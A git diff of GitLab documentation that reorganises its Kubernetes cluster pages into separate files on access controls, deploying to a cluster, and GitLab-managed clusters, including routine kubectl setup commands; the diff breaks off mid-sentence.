managed by Google Cloud Platform (GCP) -in a few clicks. +You can follow along in this [epic](https://gitlab.com/groups/gitlab-org/-/epics/6049). NOTE: Every new Google Cloud Platform (GCP) account receives @@ -35,351 +23,76 @@ accounts to get started with the GitLab integration with Google Kubernetes Engin [Follow this link](https://cloud.google.com/partners/partnercredit/?pcn_code=0014M00001h35gDQAQ#contact-form) to apply for credit. -## Before you begin - -Before [adding a Kubernetes cluster](#create-new-cluster) using GitLab, you need: - -- GitLab itself. Either: - - A [GitLab.com account](https://about.gitlab.com/pricing/#gitlab-com). - - A [self-managed installation](https://about.gitlab.com/pricing/#self-managed) with GitLab version - 12.5 or later. This ensures the GitLab UI can be used for cluster creation. -- The following GitLab access: - - [Maintainer role for a project](../../permissions.md#project-members-permissions) for a - project-level cluster. - - [Maintainer role for a group](../../permissions.md#group-members-permissions) for a - group-level cluster. - - [Admin Area access](../../admin_area/index.md) for a self-managed instance-level - cluster. **(FREE SELF)** - -## Access controls - -> - Restricted service account for deployment was [introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/51716) in GitLab 11.5. - -When creating a cluster in GitLab, you are asked if you would like to create either: - -- A [Role-based access control (RBAC)](https://kubernetes.io/docs/reference/access-authn-authz/rbac/) - cluster, which is the GitLab default and recommended option. -- An [Attribute-based access control (ABAC)](https://kubernetes.io/docs/reference/access-authn-authz/abac/) cluster. - -When GitLab creates the cluster, -a `gitlab` service account with `cluster-admin` privileges is created in the `default` namespace -to manage the newly created cluster. - -Helm also creates additional service accounts and other resources for each -installed application. Consult the documentation of the Helm charts for each application -for details. - -If you are [adding an existing Kubernetes cluster](add_remove_clusters.md#add-existing-cluster), -ensure the token of the account has administrator privileges for the cluster. - -The resources created by GitLab differ depending on the type of cluster. - -### Important notes - -Note the following about access controls: - -- Environment-specific resources are only created if your cluster is - [managed by GitLab](index.md#gitlab-managed-clusters). -- If your cluster was created before GitLab 12.2, it uses a single namespace for all project - environments. - -### RBAC cluster resources - -GitLab creates the following resources for RBAC clusters. - -| Name | Type | Details | Created when | -|:----------------------|:---------------------|:-----------------------------------------------------------------------------------------------------------|:-----------------------| -| `gitlab` | `ServiceAccount` | `default` namespace | Creating a new cluster | -| `gitlab-admin` | `ClusterRoleBinding` | [`cluster-admin`](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#user-facing-roles) roleRef | Creating a new cluster | -| `gitlab-token` | `Secret` | Token for `gitlab` ServiceAccount | Creating a new cluster | -| `tiller` | `ServiceAccount` | `gitlab-managed-apps` namespace | Installing Helm charts | -| `tiller-admin` | `ClusterRoleBinding` | `cluster-admin` roleRef | Installing Helm charts | -| Environment namespace | `Namespace` | Contains all environment-specific resources | Deploying to a cluster | -| Environment namespace | `ServiceAccount` | Uses namespace of environment | Deploying to a cluster | -| Environment namespace | `Secret` | Token for environment ServiceAccount | Deploying to a cluster | -| Environment namespace | `RoleBinding` | [`admin`](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#user-facing-roles) roleRef | Deploying to a cluster | +NOTE: +Watch the webcast [Scalable app deployment with GitLab and Google Cloud Platform](https://about.gitlab.com/webcast/scalable-app-deploy/) +and learn how to spin up a Kubernetes cluster managed by Google Cloud Platform (GCP) +in a few clicks. -The environment namespace `RoleBinding` was -[updated](https://gitlab.com/gitlab-org/gitlab/-/issues/31113) in GitLab 13.6 -to `admin` roleRef. Previously, the `edit` roleRef was used. +## Create new cluster -### ABAC cluster resources +> The certificate-based method for creating clusters from GitLab was [deprecated](https://gitlab.com/gitlab-org/gitlab/-/issues/327908) in GitLab 14.0. -GitLab creates the following resources for ABAC clusters. +As of GitLab 14.0, use [Infrastructure as Code](../../infrastructure/index.md) +to **safely create your new cluster from GitLab**. -| Name | Type | Details | Created when | -|:----------------------|:---------------------|:-------------------------------------|:---------------------------| -| `gitlab` | `ServiceAccount` | `default` namespace | Creating a new cluster | -| `gitlab-token` | `Secret` | Token for `gitlab` ServiceAccount | Creating a new cluster | -| `tiller` | `ServiceAccount` | `gitlab-managed-apps` namespace | Installing Helm charts | -| `tiller-admin` | `ClusterRoleBinding` | `cluster-admin` roleRef | Installing Helm charts | -| Environment namespace | `Namespace` | Contains all environment-specific resources | Deploying to a cluster | -| Environment namespace | `ServiceAccount` | Uses namespace of environment | Deploying to a cluster | -| Environment namespace | `Secret` | Token for environment ServiceAccount | Deploying to a cluster | +The certificate-based method is **deprecated** and scheduled for removal in +GitLab 15.0. However, you can still use it until then. Through +this method, you can host your cluster in EKS, GKE, on premises, and with other +providers. To host them on premises and with other providers, +use either the EKS or GKE method to guide you through and enter your cluster's +settings manually: -### Security of runners +- [New cluster hosted on Google Kubernetes Engine (GKE)](add_eks_clusters.md). +- [New cluster hosted on Amazon Elastic Kubernetes Service (EKS)](add_gke_clusters.md). -Runners have the [privileged mode](https://docs.gitlab.com/runner/executors/docker.html#the-privileged-mode) -enabled by default, which allows them to execute special commands and run -Docker in Docker. This functionality is needed to run some of the -[Auto DevOps](../../../topics/autodevops/index.md) -jobs. This implies the containers are running in privileged mode and you should, -therefore, be aware of some important details. +## Add existing cluster -The privileged flag gives all capabilities to the running container, which in -turn can do almost everything that the host can do. Be aware of the -inherent security risk associated with performing `docker run` operations on -arbitrary images as they effectively have root access. +If you already have a cluster and want to integrate it with GitLab, see how to +[add an existing cluster](add_existing_cluster.md). -If you don't want to use a runner in privileged mode, either: +## Configure your cluster -- Use shared runners on GitLab.com. They don't have this security issue. -- Set up your own runners using the configuration described at - [shared runners](../../gitlab_com/index.md#shared-runners) using - [`docker+machine`](https://docs.gitlab.com/runner/executors/docker_machine.html). +As of GitLab 14.0, use the [GitLab Kubernetes Agent](../../clusters/agent/index.md) to configure your cluster. -## Create new cluster +## Disable a cluster -New clusters can be created using GitLab on Google Kubernetes Engine (GKE) or -Amazon Elastic Kubernetes Service (EKS) at the project, group, or instance level: +When you successfully create a new Kubernetes cluster or add an existing +one to GitLab, the cluster connection to GitLab becomes enabled. To disable it: -1. Navigate to your: - - Project's **{cloud-gear}** **Infrastructure > Kubernetes clusters** page, for a project-level - cluster. +1. Go to your: + - Project's **{cloud-gear}** **Infrastructure > Kubernetes clusters** page, for a project-level cluster. - Group's **{cloud-gear}** **Kubernetes** page, for a group-level cluster. - - **Admin Area >** **{cloud-gear}** **Kubernetes** page, for an instance-level cluster. -1. Click **Integrate with a cluster certificate**. -1. Click the **Create new cluster** tab. -1. Click either **Amazon EKS** or **Google GKE**, and follow the instructions for your desired service: - - [Amazon EKS](add_eks_clusters.md#new-eks-cluster). - - [Google GKE](add_gke_clusters.md#creating-the-cluster-on-gke). - -After creating a cluster, you can [install runners](https://docs.gitlab.com/runner/install/kubernetes.html), -add a [cluster management project](../../clusters/management_project.md), -configure [Auto DevOps](../../../topics/autodevops/index.md), -or start [deploying right away](index.md#deploying-to-a-kubernetes-cluster). - -## Add existing cluster - -If you have an existing Kubernetes cluster, you can add it to a project, group, -or instance, and [install runners](https://docs.gitlab.com/runner/install/kubernetes.html) -on it (the cluster does not need to be added to GitLab first). - -After adding a cluster, you can add a [cluster management project](../../clusters/management_project.md), -configure [Auto DevOps](../../../topics/autodevops/index.md), -or start [deploying right away](index.md#deploying-to-a-kubernetes-cluster). - -### Existing Kubernetes cluster - -To add a Kubernetes cluster to your project, group, or instance: - -1. Navigate to your: - 1. Project's **{cloud-gear}** **Infrastructure > Kubernetes clusters** page, for a project-level - cluster. - 1. Group's **{cloud-gear}** **Kubernetes** page, for a group-level cluster. - 1. **Admin Area >** **{cloud-gear}** **Kubernetes** page, for an instance-level cluster. -1. Click **Add Kubernetes cluster**. -1. Click the **Add existing cluster** tab and fill in the details: - 1. **Kubernetes cluster name** (required) - The name you wish to give the cluster. - 1. **Environment scope** (required) - The - [associated environment](index.md#setting-the-environment-scope) to this cluster. - 1. **API URL** (required) - - It's the URL that GitLab uses to access the Kubernetes API. Kubernetes - exposes several APIs, we want the "base" URL that is common to all of them. - For example, `https://kubernetes.example.com` rather than `https://kubernetes.example.com/api/v1`. - - Get the API URL by running this command: - - ```shell - kubectl cluster-info | grep -E 'Kubernetes master|Kubernetes control plane' | awk '/http/ {print $NF}' - ``` - - 1. **CA certificate** (required) - A valid Kubernetes certificate is needed to authenticate to the cluster. We use the certificate created by default. - 1. List the secrets with `kubectl get secrets`, and one should be named similar to - `default-token-xxxxx`. Copy that token name for use below. - 1. Get the certificate by running this command: - - ```shell - kubectl get secret <secret name> -o jsonpath="{['data']['ca\.crt']}" | base64 --decode - ``` - - If the command returns the entire certificate chain, you must copy the Root CA - certificate and any intermediate certificates at the bottom of the chain. - A chain file has following structure: - - ```plaintext - -----BEGIN MY CERTIFICATE----- - -----END MY CERTIFICATE----- - -----BEGIN INTERMEDIATE CERTIFICATE----- - -----END INTERMEDIATE CERTIFICATE----- - -----BEGIN INTERMEDIATE CERTIFICATE----- - -----END INTERMEDIATE CERTIFICATE----- - -----BEGIN ROOT CERTIFICATE----- - -----END ROOT CERTIFICATE----- - ``` - - 1. **Token** - - GitLab authenticates against Kubernetes using service tokens, which are - scoped to a particular `namespace`. - **The token used should belong to a service account with - [`cluster-admin`](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#user-facing-roles) - privileges.** To create this service account: - 1. Create a file called `gitlab-admin-service-account.yaml` with contents: - - ```yaml - apiVersion: v1 - kind: ServiceAccount - metadata: - name: gitlab - namespace: kube-system - --- - apiVersion: rbac.authorization.k8s.io/v1 - kind: ClusterRoleBinding - metadata: - name: gitlab-admin - roleRef: - apiGroup: rbac.authorization.k8s.io - kind: ClusterRole - name: cluster-admin - subjects: - - kind: ServiceAccount - name: gitlab - namespace: kube-system - ``` - - 1. Apply the service account and cluster role binding to your cluster: - - ```shell - kubectl apply -f gitlab-admin-service-account.yaml - ``` - - You need the `container.clusterRoleBindings.create` permission - to create cluster-level roles. If you do not have this permission, - you can alternatively enable Basic Authentication and then run the - `kubectl apply` command as an administrator: - - ```shell - kubectl apply -f gitlab-admin-service-account.yaml --username=admin --password=<password> - ``` - - NOTE: - Basic Authentication can be turned on and the password credentials - can be obtained using the Google Cloud Console. - - Output: - - ```shell - serviceaccount "gitlab" created - clusterrolebinding "gitlab-admin" created - ``` - - 1. Retrieve the token for the `gitlab` service account: - - ```shell - kubectl -n kube-system describe secret $(kubectl -n kube-system get secret | grep gitlab | awk '{print $1}') - ``` - - Copy the `<authentication_token>` value from the output: - - ```plaintext - Name: gitlab-token-b5zv4 - Namespace: kube-system - Labels: <none> - Annotations: kubernetes.io/service-account.name=gitlab - kubernetes.io/service-account.uid=bcfe66ac-39be-11e8-97e8-026dce96b6e8 - - Type: kubernetes.io/service-account-token - - Data - ==== - ca.crt: 1025 bytes - namespace: 11 bytes - token: <authentication_token> - ``` - - NOTE: - For GKE clusters, you need the - `container.clusterRoleBindings.create` permission to create a cluster - role binding. You can follow the [Google Cloud - documentation](https://cloud.google.com/iam/docs/granting-changing-revoking-access) - to grant access. - - 1. **GitLab-managed cluster** - Leave this checked if you want GitLab to manage namespaces and service accounts for this cluster. - See the [Managed clusters section](index.md#gitlab-managed-clusters) for more information. - 1. **Project namespace** (optional) - You don't have to fill it in; by leaving - it blank, GitLab creates one for you. Also: - - Each project should have a unique namespace. - - The project namespace is not necessarily the namespace of the secret, if - you're using a secret with broader permissions, like the secret from `default`. - - You should **not** use `default` as the project namespace. - - If you or someone created a secret specifically for the project, usually - with limited permissions, the secret's namespace and project namespace may - be the same. - -1. Finally, click the **Create Kubernetes cluster** button. - -After a couple of minutes, your cluster is ready. - -#### Disable Role-Based Access Control (RBAC) (optional) - -When connecting a cluster via GitLab integration, you may specify whether the -cluster is RBAC-enabled or not. This affects how GitLab interacts with the -cluster for certain operations. If you did *not* check the **RBAC-enabled cluster** -checkbox at creation time, GitLab assumes RBAC is disabled for your cluster -when interacting with it. If so, you must disable RBAC on your cluster for the -integration to work properly. - - - -WARNING: -Disabling RBAC means that any application running in the cluster, -or user who can authenticate to the cluster, has full API access. This is a -[security concern](index.md#security-implications), and may not be desirable. - -To effectively disable RBAC, global permissions can be applied granting full access: - -```shell -kubectl create clusterrolebinding permissive-binding \ - --clusterrole=cluster-admin \ - --user=admin \ - --user=kubelet \ - --group=system:serviceaccounts -``` + - **Menu >** **{admin}** **Admin >** **{cloud-gear}** **Kubernetes** page, for an instance-level cluster. +1. Select the name of the cluster you want to disable. +1. Toggle **GitLab Integration** off (in gray). +1. Click **Save changes**. -## Enabling or disabling integration +## Remove a cluster -The Kubernetes cluster integration enables after you have successfully either created -a new cluster or added an existing one. To disable Kubernetes cluster integration: +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/26815) in GitLab 12.6, you can remove cluster integrations and resources. -1. Navigate to your: - - Project's **{cloud-gear}** **Infrastructure > Kubernetes clusters** page, for a project-level - cluster. - - Group's **{cloud-gear}** **Kubernetes** page, for a group-level cluster. - - **Admin Area >** **{cloud-gear}** **Kubernetes** page, for an instance-level cluster. -1. Click on the name of the cluster. -1. Click the **GitLab Integration** toggle. -1. Click **Save changes**. +When you remove a cluster integration, you only remove the cluster relationship +to GitLab, not the cluster. To remove the cluster itself, visit your cluster's +GKE or EKS dashboard to do it from their UI or use `kubectl`. -## Removing integration +You need at least Maintainer [permissions](../../permissions.md) to your +project or group to remove the integration with GitLab. -To remove the Kubernetes cluster integration from your project, first navigate to the **Advanced Settings** tab of the cluster details page and either: +When removing a cluster integration, you have two options: -- Select **Remove integration**, to remove only the Kubernetes integration. -- [From GitLab 12.6](https://gitlab.com/gitlab-org/gitlab/-/issues/26815), select - **Remove integration and resources**, to also remove all related GitLab cluster resources (for - example, namespaces, roles, and bindings) when removing the integration. +- **Remove integration**: remove only the Kubernetes integration. +- **Remove integration and resources**: remove the cluster integration and +all GitLab cluster-related resources such as namespaces, roles, and bindings. -When removing the cluster integration, note: +To remove the Kubernetes cluster integration: -- You need Maintainer [permissions](../../permissions.md) and above to remove a Kubernetes cluster - integration. -- When you remove a cluster, you only remove its relationship to GitLab, not the cluster itself. To - remove the cluster, you can do so by visiting the GKE or EKS dashboard, or using `kubectl`. +1. Go to your cluster details page. +1. Select the **Advanced Settings** tab. +1. Select either **Remove integration** or **Remove integration and resources**. -## Learn more +## Access controls -To learn more on automatically deploying your applications, -read about [Auto DevOps](../../../topics/autodevops/index.md). +See [cluster access controls (RBAC or ABAC)](cluster_access.md). ## Troubleshooting diff --git a/doc/user/project/clusters/cluster_access.md b/doc/user/project/clusters/cluster_access.md new file mode 100644 index 00000000000..713a60b2dd0 --- /dev/null +++ b/doc/user/project/clusters/cluster_access.md @@ -0,0 +1,88 @@ +--- +stage: Configure +group: Configure +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Cluster access controls (RBAC or ABAC) + +> Restricted service account for deployment was [introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/51716) in GitLab 11.5. + +When creating a cluster in GitLab, you are asked if you would like to create either: + +- A [Role-based access control (RBAC)](https://kubernetes.io/docs/reference/access-authn-authz/rbac/) + cluster, which is the GitLab default and recommended option. +- An [Attribute-based access control (ABAC)](https://kubernetes.io/docs/reference/access-authn-authz/abac/) cluster. + +When GitLab creates the cluster, +a `gitlab` service account with `cluster-admin` privileges is created in the `default` namespace +to manage the newly created cluster. + +Helm also creates additional service accounts and other resources for each +installed application. Consult the documentation of the Helm charts for each application +for details. + +If you are [adding an existing Kubernetes cluster](add_remove_clusters.md#add-existing-cluster), +ensure the token of the account has administrator privileges for the cluster. + +The resources created by GitLab differ depending on the type of cluster. + +## Important notes + +Note the following about access controls: + +- Environment-specific resources are only created if your cluster is + [managed by GitLab](index.md#gitlab-managed-clusters). +- If your cluster was created before GitLab 12.2, it uses a single namespace for all project + environments. + +## RBAC cluster resources + +GitLab creates the following resources for RBAC clusters. + +| Name | Type | Details | Created when | +|:----------------------|:---------------------|:-----------------------------------------------------------------------------------------------------------|:-----------------------| +| `gitlab` | `ServiceAccount` | `default` namespace | Creating a new cluster | +| `gitlab-admin` | `ClusterRoleBinding` | [`cluster-admin`](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#user-facing-roles) roleRef | Creating a new cluster | +| `gitlab-token` | `Secret` | Token for `gitlab` ServiceAccount | Creating a new cluster | +| Environment namespace | `Namespace` | Contains all environment-specific resources | Deploying to a cluster | +| Environment namespace | `ServiceAccount` | Uses namespace of environment | Deploying to a cluster | +| Environment namespace | `Secret` | Token for environment ServiceAccount | Deploying to a cluster | +| Environment namespace | `RoleBinding` | [`admin`](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#user-facing-roles) roleRef | Deploying to a cluster | + +The environment namespace `RoleBinding` was +[updated](https://gitlab.com/gitlab-org/gitlab/-/issues/31113) in GitLab 13.6 +to `admin` roleRef. Previously, the `edit` roleRef was used. + +## ABAC cluster resources + +GitLab creates the following resources for ABAC clusters. + +| Name | Type | Details | Created when | +|:----------------------|:---------------------|:-------------------------------------|:---------------------------| +| `gitlab` | `ServiceAccount` | `default` namespace | Creating a new cluster | +| `gitlab-token` | `Secret` | Token for `gitlab` ServiceAccount | Creating a new cluster | +| Environment namespace | `Namespace` | Contains all environment-specific resources | Deploying to a cluster | +| Environment namespace | `ServiceAccount` | Uses namespace of environment | Deploying to a cluster | +| Environment namespace | `Secret` | Token for environment ServiceAccount | Deploying to a cluster | + +## Security of runners + +Runners have the [privileged mode](https://docs.gitlab.com/runner/executors/docker.html#the-privileged-mode) +enabled by default, which allows them to execute special commands and run +Docker in Docker. This functionality is needed to run some of the +[Auto DevOps](../../../topics/autodevops/index.md) +jobs. This implies the containers are running in privileged mode and you should, +therefore, be aware of some important details. + +The privileged flag gives all capabilities to the running container, which in +turn can do almost everything that the host can do. Be aware of the +inherent security risk associated with performing `docker run` operations on +arbitrary images as they effectively have root access. + +If you don't want to use a runner in privileged mode, either: + +- Use shared runners on GitLab.com. They don't have this security issue. +- Set up your own runners using the configuration described at +[shared runners](../../gitlab_com/index.md#shared-runners) using +[`docker+machine`](https://docs.gitlab.com/runner/executors/docker_machine.html). diff --git a/doc/user/project/clusters/deploy_to_cluster.md b/doc/user/project/clusters/deploy_to_cluster.md new file mode 100644 index 00000000000..fdd65d70242 --- /dev/null +++ b/doc/user/project/clusters/deploy_to_cluster.md @@ -0,0 +1,141 @@ +--- +stage: Configure +group: Configure +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Deploy to a Kubernetes cluster + +A Kubernetes cluster can be the destination for a deployment job. If + +- The cluster is integrated with GitLab, special + [deployment variables](#deployment-variables) are made available to your job + and configuration is not required. You can immediately begin interacting with + the cluster from your jobs using tools such as `kubectl` or `helm`. +- You don't use the GitLab cluster integration, you can still deploy to your + cluster. However, you must configure Kubernetes tools yourself + using [CI/CD variables](../../../ci/variables/index.md#custom-cicd-variables) + before you can interact with the cluster from your jobs. + +## Deployment variables + +Deployment variables require a valid [Deploy Token](../deploy_tokens/index.md) named +[`gitlab-deploy-token`](../deploy_tokens/index.md#gitlab-deploy-token), and the +following command in your deployment job script, for Kubernetes to access the registry: + +- Using Kubernetes 1.18+: + + ```shell + kubectl create secret docker-registry gitlab-registry --docker-server="$CI_REGISTRY" --docker-username="$CI_DEPLOY_USER" --docker-password="$CI_DEPLOY_PASSWORD" --docker-email="$GITLAB_USER_EMAIL" -o yaml --dry-run=client | kubectl apply -f - + ``` + +- Using Kubernetes <1.18: + + ```shell + kubectl create secret docker-registry gitlab-registry --docker-server="$CI_REGISTRY" --docker-username="$CI_DEPLOY_USER" --docker-password="$CI_DEPLOY_PASSWORD" --docker-email="$GITLAB_USER_EMAIL" -o yaml --dry-run | kubectl apply -f - + ``` + +The Kubernetes cluster integration exposes these +[deployment variables](../../../ci/variables/index.md#deployment-variables) in the +GitLab CI/CD build environment to deployment jobs. Deployment jobs have +[defined a target environment](../../../ci/environments/index.md). + +| Deployment Variable | Description | +|----------------------------|-------------| +| `KUBE_URL` | Equal to the API URL. | +| `KUBE_TOKEN` | The Kubernetes token of the [environment service account](cluster_access.md). Prior to GitLab 11.5, `KUBE_TOKEN` was the Kubernetes token of the main service account of the cluster integration. | +| `KUBE_NAMESPACE` | The namespace associated with the project's deployment service account. In the format `<project_name>-<project_id>-<environment>`. For GitLab-managed clusters, a matching namespace is automatically created by GitLab in the cluster. If your cluster was created before GitLab 12.2, the default `KUBE_NAMESPACE` is set to `<project_name>-<project_id>`. | +| `KUBE_CA_PEM_FILE` | Path to a file containing PEM data. Only present if a custom CA bundle was specified. | +| `KUBE_CA_PEM` | (**deprecated**) Raw PEM data. Only if a custom CA bundle was specified. | +| `KUBECONFIG` | Path to a file containing `kubeconfig` for this deployment. CA bundle would be embedded if specified. This configuration also embeds the same token defined in `KUBE_TOKEN` so you likely need only this variable. This variable name is also automatically picked up by `kubectl` so you don't need to reference it explicitly if using `kubectl`. | +| `KUBE_INGRESS_BASE_DOMAIN` | From GitLab 11.8, this variable can be used to set a domain per cluster. See [cluster domains](gitlab_managed_clusters.md#base-domain) for more information. | + +## Custom namespace + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/27630) in GitLab 12.6. +> - An option to use project-wide namespaces [was added](https://gitlab.com/gitlab-org/gitlab/-/issues/38054) in GitLab 13.5. + +The Kubernetes integration provides a `KUBECONFIG` with an auto-generated namespace +to deployment jobs. It defaults to using project-environment specific namespaces +of the form `<prefix>-<environment>`, where `<prefix>` is of the form +`<project_name>-<project_id>`. To learn more, read [Deployment variables](#deployment-variables). + +You can customize the deployment namespace in a few ways: + +- You can choose between a **namespace per [environment](../../../ci/environments/index.md)** + or a **namespace per project**. A namespace per environment is the default and recommended + setting, as it prevents the mixing of resources between production and non-production environments. +- When using a project-level cluster, you can additionally customize the namespace prefix. + When using namespace-per-environment, the deployment namespace is `<prefix>-<environment>`, + but otherwise just `<prefix>`. +- For **non-managed** clusters, the auto-generated namespace is set in the `KUBECONFIG`, + but the user is responsible for ensuring its existence. You can fully customize + this value using + [`environment:kubernetes:namespace`](../../../ci/environments/index.md#configure-kubernetes-deployments) + in `.gitlab-ci.yml`. + +When you customize the namespace, existing environments remain linked to their current +namespaces until you [clear the cluster cache](gitlab_managed_clusters.md#clearing-the-cluster-cache). + +### Protecting credentials + +By default, anyone who can create a deployment job can access any CI/CD variable in +an environment's deployment job. This includes `KUBECONFIG`, which gives access to +any secret available to the associated service account in your cluster. +To keep your production credentials safe, consider using +[protected environments](../../../ci/environments/protected_environments.md), +combined with *one* of the following: + +- A GitLab-managed cluster and namespace per environment. +- An environment-scoped cluster per protected environment. The same cluster + can be added multiple times with multiple restricted service accounts. + +## Web terminals for Kubernetes clusters + +> Introduced in GitLab 8.15. + +The Kubernetes integration adds [web terminal](../../../ci/environments/index.md#web-terminals) +support to your [environments](../../../ci/environments/index.md). This is based +on the `exec` functionality found in Docker and Kubernetes, so you get a new +shell session in your existing containers. To use this integration, you +should deploy to Kubernetes using the deployment variables above, ensuring any +deployments, replica sets, and pods are annotated with: + +- `app.gitlab.com/env: $CI_ENVIRONMENT_SLUG` +- `app.gitlab.com/app: $CI_PROJECT_PATH_SLUG` + +`$CI_ENVIRONMENT_SLUG` and `$CI_PROJECT_PATH_SLUG` are the values of +the CI/CD variables. + +You must be the project owner or have `maintainer` permissions to use terminals. +Support is limited to the first container in the first pod of your environment. + +## Troubleshooting + +Before the deployment jobs starts, GitLab creates the following specifically for +the deployment job: + +- A namespace. +- A service account. + +However, sometimes GitLab cannot create them. In such instances, your job can fail with the message: + +```plaintext +This job failed because the necessary resources were not successfully created. +``` + +To find the cause of this error when creating a namespace and service account, check the [logs](../../../administration/logs.md#kuberneteslog). + +Reasons for failure include: + +- The token you gave GitLab does not have [`cluster-admin`](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#user-facing-roles) + privileges required by GitLab. +- Missing `KUBECONFIG` or `KUBE_TOKEN` deployment variables. To be passed to your job, they must have a matching + [`environment:name`](../../../ci/environments/index.md). If your job has no + `environment:name` set, the Kubernetes credentials are not passed to it. + +NOTE: +Project-level clusters upgraded from GitLab 12.0 or older may be configured +in a way that causes this error. Ensure you deselect the +[GitLab-managed cluster](gitlab_managed_clusters.md) option if you want to manage +namespaces and service accounts yourself. diff --git a/doc/user/project/clusters/gitlab_managed_clusters.md b/doc/user/project/clusters/gitlab_managed_clusters.md new file mode 100644 index 00000000000..77921ec1dff --- /dev/null +++ b/doc/user/project/clusters/gitlab_managed_clusters.md @@ -0,0 +1,102 @@ +--- +stage: Configure +group: Configure +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# GitLab-managed clusters + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/22011) in GitLab 11.5. +> - Became [optional](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/26565) in GitLab 11.11. + +You can choose to allow GitLab to manage your cluster for you. If your cluster +is managed by GitLab, resources for your projects are automatically created. See +the [Access controls](add_remove_clusters.md#access-controls) section for +details about the created resources. + +If you choose to manage your own cluster, project-specific resources aren't created +automatically. If you are using [Auto DevOps](../../../topics/autodevops/index.md), you must +explicitly provide the `KUBE_NAMESPACE` [deployment variable](deploy_to_cluster.md#deployment-variables) +for your deployment jobs to use. Otherwise, a namespace is created for you. + +WARNING: +Be aware that manually managing resources that have been created by GitLab, like +namespaces and service accounts, can cause unexpected errors. If this occurs, try +[clearing the cluster cache](#clearing-the-cluster-cache). + +## Clearing the cluster cache + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/31759) in GitLab 12.6. + +If you allow GitLab to manage your cluster, GitLab stores a cached +version of the namespaces and service accounts it creates for your projects. If you +modify these resources in your cluster manually, this cache can fall out of sync with +your cluster. This can cause deployment jobs to fail. + +To clear the cache: + +1. Navigate to your project's **Infrastructure > Kubernetes clusters** page, and select your cluster. +1. Expand the **Advanced settings** section. +1. Click **Clear cluster cache**. + +## Base domain + +> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/24580) in GitLab 11.8. + +Specifying a base domain automatically sets `KUBE_INGRESS_BASE_DOMAIN` as an deployment variable. +If you are using [Auto DevOps](../../../topics/autodevops/index.md), this domain is used for the different +stages. For example, Auto Review Apps and Auto Deploy. + +The domain should have a wildcard DNS configured to the Ingress IP address. +You can either: + +- Create an `A` record that points to the Ingress IP address with your domain provider. +- Enter a wildcard DNS address using a service such as `nip.io` or `xip.io`. For example, `192.168.1.1.xip.io`. + +To determine the external Ingress IP address, or external Ingress hostname: + +- *If the cluster is on GKE*: + 1. Click the **Google Kubernetes Engine** link in the **Advanced settings**, + or go directly to the [Google Kubernetes Engine dashboard](https://console.cloud.google.com/kubernetes/). + 1. Select the proper project and cluster. + 1. Click **Connect** + 1. Execute the `gcloud` command in a local terminal or using the **Cloud Shell**. + +- *If the cluster is not on GKE*: Follow the specific instructions for your + Kubernetes provider to configure `kubectl` with the right credentials. + The output of the following examples show the external endpoint of your + cluster. This information can then be used to set up DNS entries and forwarding + rules that allow external access to your deployed applications. + +Depending an your Ingress, the external IP address can be retrieved in various ways. +This list provides a generic solution, and some GitLab-specific approaches: + +- In general, you can list the IP addresses of all load balancers by running: + + ```shell + kubectl get svc --all-namespaces -o jsonpath='{range.items[?(@.status.loadBalancer.ingress)]}{.status.loadBalancer.ingress[*].ip} ' + ``` + +- If you installed Ingress using the **Applications**, run: + + ```shell + kubectl get service --namespace=gitlab-managed-apps ingress-nginx-ingress-controller -o jsonpath='{.status.loadBalancer.ingress[0].ip}' + ``` + +- Some Kubernetes clusters return a hostname instead, like + [Amazon EKS](https://aws.amazon.com/eks/). For these platforms, run: + + ```shell + kubectl get service --namespace=gitlab-managed-apps ingress-nginx-ingress-controller -o jsonpath='{.status.loadBalancer.ingress[0].hostname}' + ``` + + If you use EKS, an [Elastic Load Balancer](https://docs.aws.amazon.com/elasticloadbalancing/) + is also created, which incurs additional AWS costs. + +- Istio/Knative uses a different command. Run: + + ```shell + kubectl get svc --namespace=istio-system istio-ingressgateway -o jsonpath='{.status.loadBalancer.ingress[0].ip} ' + ``` + +If you see a trailing `%` on some Kubernetes versions, do not include it. diff --git a/doc/user/project/clusters/index.md b/doc/user/project/clusters/index.md index 8dd8ed52dd7..a0efea267f0 100644 --- a/doc/user/project/clusters/index.md +++ b/doc/user/project/clusters/index.md @@ -1,6 +1,6 @@ --- -stage: Monitor -group: Monitor +stage: Configure +group: Configure info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- @@ -12,35 +12,30 @@ info: To determine the technical writer assigned to the Stage/Group associated w > - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/39840) in > GitLab 11.11 for [instances](../../instance/clusters/index.md). -Using the GitLab project Kubernetes integration, you can: - -- Use [Review Apps](../../../ci/review_apps/index.md). -- Run [pipelines](../../../ci/pipelines/index.md). -- [Deploy](#deploying-to-a-kubernetes-cluster) your applications. -- Detect and [monitor Kubernetes](#monitoring-your-kubernetes-cluster). -- Use it with [Auto DevOps](#auto-devops). -- Use [Web terminals](#web-terminals). -- Use [Deploy Boards](#deploy-boards). -- Use [Canary Deployments](#canary-deployments). **(PREMIUM)** -- Use [deployment variables](#deployment-variables). -- Use [role-based or attribute-based access controls](add_remove_clusters.md#access-controls). -- View [Logs](#viewing-pod-logs). -- Run serverless workloads on [Kubernetes with Knative](serverless/index.md). +We offer extensive integrations to help you connect and manage your Kubernetes clusters from GitLab. -Besides integration at the project level, Kubernetes clusters can also be -integrated at the [group level](../../group/clusters/index.md) or -[GitLab instance 